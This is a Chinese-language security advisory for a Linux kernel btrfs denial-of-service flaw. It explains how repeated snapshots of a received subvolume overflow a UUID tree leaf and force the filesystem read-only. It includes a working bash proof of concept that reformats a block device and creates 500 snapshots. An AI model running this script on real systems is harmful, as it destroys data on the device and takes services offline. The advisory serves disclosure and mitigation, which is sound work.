CVE-2026-43361 CVSS 5.5 中危

CVE-2026-43361 Linux内核btrfs本地拒绝服务漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43361

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的btrfs文件系统存在一个本地拒绝服务漏洞。攻击者可以通过对已接收的子卷进行大量快照操作，触发BTRFS_UUID_KEY_RECEIVED_SUBVOL项溢出。由于相关操作不需要CAP_SYS_ADMIN权限，低权限用户即可利用此漏洞导致事务中止，进而将文件系统强制转换为只读模式，造成系统服务不可用。

技术细节

该漏洞源于btrfs在处理已接收子卷的快照时，未对UUID树中叶子节点的大小限制进行充分校验。当用户循环对带有received_uuid的子卷进行快照时，系统会不断向UUID树插入BTRFS_UUID_KEY_RECEIVED_SUBVOL项。当插入的数据量超过单个叶子节点的最大容量时，内核会返回-75（EOVERFLOW）错误。这导致btrfs事务处理逻辑触发abort机制，为保护数据一致性将文件系统重新挂载为只读（RO）模式。由于snapshot、send和receive操作仅检查inode_owner_or_capable()，本地普通用户即可利用此漏洞破坏系统可用性。

攻击链分析

STEP 1

环境准备

攻击者准备一个btrfs文件系统并挂载，创建子卷并将其设置为只读模式以便发送。

STEP 2

发送与接收

使用btrfs send和receive命令将子卷发送并接收到一个新目录，赋予子卷received_uuid属性。

STEP 3

循环快照

攻击者编写脚本，对已接收的子卷进行循环快照操作（约500次）。

STEP 4

触发溢出

随着快照数量增加，UUID树中的BTRFS_UUID_KEY_RECEIVED_SUBVOL项填满叶子节点，触发数据类型溢出错误。

STEP 5

拒绝服务

内核检测到错误并中止事务，将文件系统强制转为只读模式，导致系统功能受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash

# CVE-2026-43361 PoC: Trigger btrfs transaction abort via snapshot overflow
# Note: Requires a block device (e.g., /dev/sdi) to test on.

DEV=/dev/sdi
MNT=/mnt/sdi

# Use smallest node size to make the test faster.
mkfs.btrfs -f --nodesize 4K $DEV
mount $DEV $MNT

# Create a subvolume and set it to RO so that it can be used for send.
btrfs subvolume create $MNT/sv
touch $MNT/sv/foo
btrfs property set $MNT/sv ro true

# Send and receive the subvolume into snaps/sv.
mkdir $MNT/snaps
btrfs send $MNT/sv | btrfs receive $MNT/snaps

# Now snapshot the received subvolume, which has a received_uuid,
# a lot of times to trigger the leaf overflow.
total=500
for ((i = 1; i <= $total; i++)); do
    echo -ne "\rCreating snapshot $i/$total"
    btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
done
echo

umount $MNT

影响范围

Linux Kernel < 6.19

Linux Kernel (包含受影响的btrfs模块的主线及稳定版分支)

防御指南

临时缓解措施

在无法立即升级内核的情况下，应严格限制普通用户对btrfs卷的写入及快照权限，避免非管理员用户执行btrfs receive和snapshot操作。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表